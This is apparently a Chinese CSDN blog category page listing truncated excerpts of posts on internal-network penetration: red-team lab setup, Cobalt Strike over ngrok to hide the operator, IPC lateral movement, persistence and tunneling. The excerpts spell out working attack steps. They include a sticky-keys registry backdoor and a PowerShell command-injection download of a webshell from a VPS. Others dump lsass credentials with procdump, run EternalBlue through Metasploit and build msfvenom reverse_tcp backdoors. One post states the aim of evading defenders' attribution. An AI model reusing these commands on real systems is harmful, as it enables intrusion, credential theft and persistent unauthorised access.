![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
内网渗透
文章平均质量分 90
shy014
这个作者很懒,什么都没留下…
展开
-
内网之靶场之VulnStack红队(五)
环境搭建:外网:192.168.135.0 内网:192.168.138.0边界机器:win7 外网:192.168.135.150 内网:192.168.138.136账号:heart 123.com #本地管理员用户sun\Administrator dc123.com #域管用户内网机器:winserver 2008 内网:192.168.138.136账号:sun\admin 2020.com #由于需要改密码,我更改为2020.com1...原创 2020-11-13 14:48:47 · 2222 阅读 · 2 评论 -
内网之利用ngrok使用cobaltstrike
场景:像我这样遵纪守法的祖国的好公民,最近遇到了一个很烦恼的问题,在渗透一些网站的时候需要cs上线,而我cs的服务器端是我的vps,我的vps上有解析了我的域名,而我的域名又进行了实名认证。如果使用cs进行上线,这不是明摆着给蓝队进行送分嘛。这不行,这可不行,不用cs又特别的麻烦。于是就想到可以通过ngrok隧道,隐藏IP进行上线。原理:大概的流程就是将cs的服务端与ngrok公网IP建立隧道,建立两个监听器,使用公网IP的监听器生成后门,使用cs服务端的监听器接收shell。当后门运行的时候,它会去访原创 2020-11-12 15:45:25 · 1426 阅读 · 0 评论 -
内网之横向移动之IPC
一,IPCIPC(Internet Process Connection)共享命名管道的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限。二,ipc$与空连接,139,445端口,默认共享的关系1,ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口原创 2020-11-11 20:04:26 · 1887 阅读 · 0 评论 -
内网之权限维持
一,shift后门方法1:修改注册表-映像劫持REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"命令说明:reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE原创 2020-11-11 14:32:00 · 910 阅读 · 0 评论 -
内网渗透之ngrok隧道
场景:拿到了一个shell,管理员权限,windows系统,手动开启了3389端口,nmap扫描3389端口为filter,怀疑是防火墙拦截了,经过与度娘多次深入浅出的交流,决定使用ngrock隧道,将该服务器3389端口映射到公网上,然后进行远程登陆。1,访问ngrok官网http://www.ngrok.cc/注册账号2,购买这个美国的,免费的,特别容易出问题的免费隧道3,开通隧道http/https协议需要有自己的域名,名称随便写,远程端口也随便写,能用就行最关键的是本地端口.原创 2020-09-24 17:21:30 · 3174 阅读 · 0 评论 -
内网渗透之内网穿透
攻击机是kali,边界机是win7,内网机是winserver2003,假定已拿到边界机win7的shell,需要与内网机建立隧道。方法如下:原创 2020-09-02 11:18:41 · 759 阅读 · 0 评论 -
内网渗透之建立隧道
一、探测内网服务器出网协议windows系统1,icmp协议出网探测ping自己的IP地址2,DNS协议出网探测ping www.baidu.comnslookup www.baidu.com3,TCP出网探测telnet vps ip2,nc攻击机:nc -lvvp 4444受害机:nc vps-ip 44443,bitsadmin /rawreturn /transfer down "http://120.79.66.58.原创 2020-09-01 00:21:04 · 4168 阅读 · 0 评论 -
内网渗透之学习笔记
1,windows下找网站路径访问网站,找一个网站上拥有的文件,然后使用dir /s /b进行搜索dir /s /b c:\checkform.js/S 显示指定目录和所有子目录中的文件。/B 使用空格式(没有标题信息或摘要)。(对于文件来说,只显示文件名和扩展名,这一条比较实用!)2、判断是否存在站库分离3,制作DNS Beacon 准备一台VPS服务器(可以直接使用我们的CS服务器),该机器的53端口一定要对外开放。然后准备好...原创 2020-08-31 16:22:19 · 723 阅读 · 0 评论 -
内网渗透之简单明文抓取
前提:存在命令执行的windows服务器利用:1,将一句话木马上传到自己的vps上,通过命令执行漏洞,执行命令将一句话木马下载到服务器当中(需要知道绝对路径)http://url?pwd=zs&cmd=cmd+/c+powershell+(new-object System.Net.WebClient).DownloadFile('http://vps/shell.txt','C:/绝对路径/shy.jsp')2,使用菜刀进行连接,上传procdump64.exe抓取lsass.原创 2020-08-22 00:22:10 · 495 阅读 · 0 评论 -
搞死虚拟机-永恒之蓝和shift后门
扫描端口:发现开启了445端口可能存在永恒之蓝(ms17_010)漏洞nmap -sV -p- -A -v 192.168.206.129开启msfmsfconsole搜素 search ms17_010使用msf验证脚本,验证是否存在ms17_010use auxiliary/scanner/smb/smb_ms17_010show options配置验证脚本set RHOSTS 192.168.206.129运行run显示存在ms17_010漏洞.原创 2020-07-30 17:21:02 · 925 阅读 · 0 评论 -
一次简单的域渗透
攻击机:kali 192.168.44.131军事区:window7 192.168.44.139 192.168.4.非军事区:window server 2003 192.168.4.kali:返回的连接可以使用background将当前连接切换到后台运行;3、切换到后台的会话可以使用session -i查看到,然后使用session -i id将后台的...原创 2020-03-19 16:50:10 · 444 阅读 · 0 评论 -
利用msfvenom生产windows后门
原理:利用msfvenom制作shy .exe 文件,然后发送到靶机上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机1,根据靶机操作系统,搜索适合的生产后门文件的脚本msfvenom -l | grep windows | grep x64 | grep tcp2,选择生产脚本,生产后门文件-p 选择一个payloa...原创 2019-11-05 15:37:59 · 2040 阅读 · 1 评论 -
利用msfvenom生产linux后门
1,msfvenom -l |grep linux|grep x86|grep tcp选择linux 32位TCP连接的payload生成脚本2,msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.44.131lport=4444 -f elf -o shell使用选择的脚本生成shell后门文件3,msf...原创 2019-11-05 13:50:58 · 1425 阅读 · 0 评论